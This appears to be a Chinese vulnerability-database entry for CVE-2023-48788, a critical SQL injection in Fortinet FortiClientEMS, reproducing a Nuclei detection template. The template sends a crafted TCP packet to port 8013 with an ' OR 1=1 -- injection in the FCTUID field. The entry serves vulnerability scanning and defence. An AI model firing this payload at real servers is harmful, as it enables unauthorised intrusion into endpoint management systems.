CVE-2023-48788: Fortinet Forticlient Endpoint Management Server - SQL Injection

日期: 2025-08-01 | 影响软件: Fortinet Forticlient Endpoint Management Server | POC: 已公开

漏洞描述

A improper neutralization of special elements used in an sql command ('sql injection') in Fortinet FortiClientEMS version 7.2.0 through 7.2.2, FortiClientEMS 7.0.1 through 7.0.10 allows attacker to execute unauthorized code or commands via specially crafted packets.

PoC代码[已公开]

id: CVE-2023-48788

info:
  name: Fortinet Forticlient Endpoint Management Server - SQL Injection
  author: James Horseman,ItshMoh
  severity: critical
  description: |
    A improper neutralization of special elements used in an sql command ('sql injection') in Fortinet FortiClientEMS version 7.2.0 through 7.2.2, FortiClientEMS 7.0.1 through 7.0.10 allows attacker to execute unauthorized code or commands via specially crafted packets.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-48788
    cwe-id: CWE-89
    epss-score: 0.94064
    epss-percentile: 0.99894
    cpe: cpe:2.3:a:fortinet:forticlient_enterprise_management_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: fortinet
    product: forticlient_enterprise_management_server
  tags: cve,cve2024,sqli,fortinet,kev,vkev,vuln

tcp:
  - inputs:
      - data: |
          MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD' OR 1=1 --{}\n
          IP=127.0.0.1\n
          MAC=00-50-56-11-22-33\n
          FCT_ONNET=0\n
          CAPS=32767\n
          VDOM=default\n
          EC_QUARANTINED=0\n
          SIZE=    {}\n
          \n
          X-FCCK-REGISTER: SYSINFO||QVZTSUdfVkVSPTEuMDAwMDAKUkVHX0tFWT1fCkVQX09OTkVUQ0hLU1VNPTAKQVZFTkdfVkVSPTYuMDAyNjYKREhDUF9TRVJWRVI9Tm9uZQpGQ1RPUz1XSU42NApWVUxTSUdfVkVSPTEuMDAwMDAKRkNUVkVSPTcuMC43LjAzNDUKQVBQU0lHX1ZFUj0xMy4wMDM2NApVU0VSPUFkbWluaXN0cmF0b3IKQVBQRU5HX1ZFUj00LjAwMDgyCkFWQUxTSUdfVkVSPTAuMDAwMDAKVlVMRU5HX1ZFUj0yLjAwMDMyCk9TVkVSPU1pY3Jvc29mdCBXaW5kb3dzIFNlcnZlciAyMDE5ICwgNjQtYml0IChidWlsZCAxNzc2MykKQ09NX01PREVMPVZNd2FyZSBWaXJ0dWFsIFBsYXRmb3JtClJTRU5HX1ZFUj0xLjAwMDIwCkFWX1BST1RFQ1RFRD0wCkFWQUxFTkdfVkVSPTAuMDAwMDAKUEVFUl9JUD0KRU5BQkxFRF9GRUFUVVJFX0JJVE1BUD00OQpFUF9PRkZORVRDSEtTVU09MApJTlNUQUxMRURfRkVBVFVSRV9CSVRNQVA9MTU4NTgzCkVQX0NIS1NVTT0wCkhJRERFTl9GRUFUVVJFX0JJVE1BUD0xNTU5NDMKRElTS0VOQz0KSE9TVE5BTUU9Q1lCRVItUkVUUUIxRkxQCkFWX1BST0RVQ1Q9CkZDVF9TTj1GQ1Q4MDAxNjM4ODQ4NjUxCklOU1RBTExVSUQ9NTczMTUzMkItMkUyOC00OEYwLUFDQ0YtNDI4MEU0ODNFRTE0Ck5XSUZTPUV0aGVybmV0MHwxMC4wLjQwLjg1fDAwLTUwLTU2LTg0LTMzLWIyfDEwLjAuNDAuMjU0fGY0LTRlLTA1LTRmLTZjLTQ4fDF8KnwwClVUQz0xNzEwMjcxNzc0ClBDX0RPTUFJTj0KQ09NX01BTj1WTXdhcmUsIEluYy4KQ1BVPUludGVsKFIpIFhlb24oUikgU2lsdmVyIDQyMTUgQ1BVIEAgMi41MEdIegpNRU09MTIyODcKSEREPTk5CkNPTV9TTj1WTXdhcmUtNDIgMDQgZWQgMmQgNjQgZTggMGIgMTQtNDUgZTkgZTQgZjYgNWEgYzcgNjcgODIKRE9NQUlOPQpXT1JLR1JPVVA9V09SS0dST1VQClVTRVJfU0lEPVMtMS01LTIxLTI2MTY1Njk4OTQtNDUzOTU0ODcxLTE0NTg4MDY4Mi01MDAKR1JPVVBfVEFHPQpBREdVSUQ9CkVQX0ZHVENIS1NVTT0wCkVQX1JVTEVDSEtTVU09MApXRl9GSUxFU0NIS1NVTT0wCkVQX0FQUENUUkxDSEtTVU09MAo=\n
          X-FCCK-REGISTER-END
          \r\n
          \r\n
    host:
      - "{{Hostname}}"
    port: 8013

    matchers:
      - type: word
        part: body
        words:
          - "KA_INTERVAL"
# digest: 4a0a00473045022100c306c43fcaec94000dce92c604ebfa3740922a54a32f81013166195d213beb8f022075a96fb906bb965c105aeaa73f300792da8f9e49124326e53909767e3b2869ff:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/network/cves/2023/CVE-2023-48788.yaml

相关漏洞推荐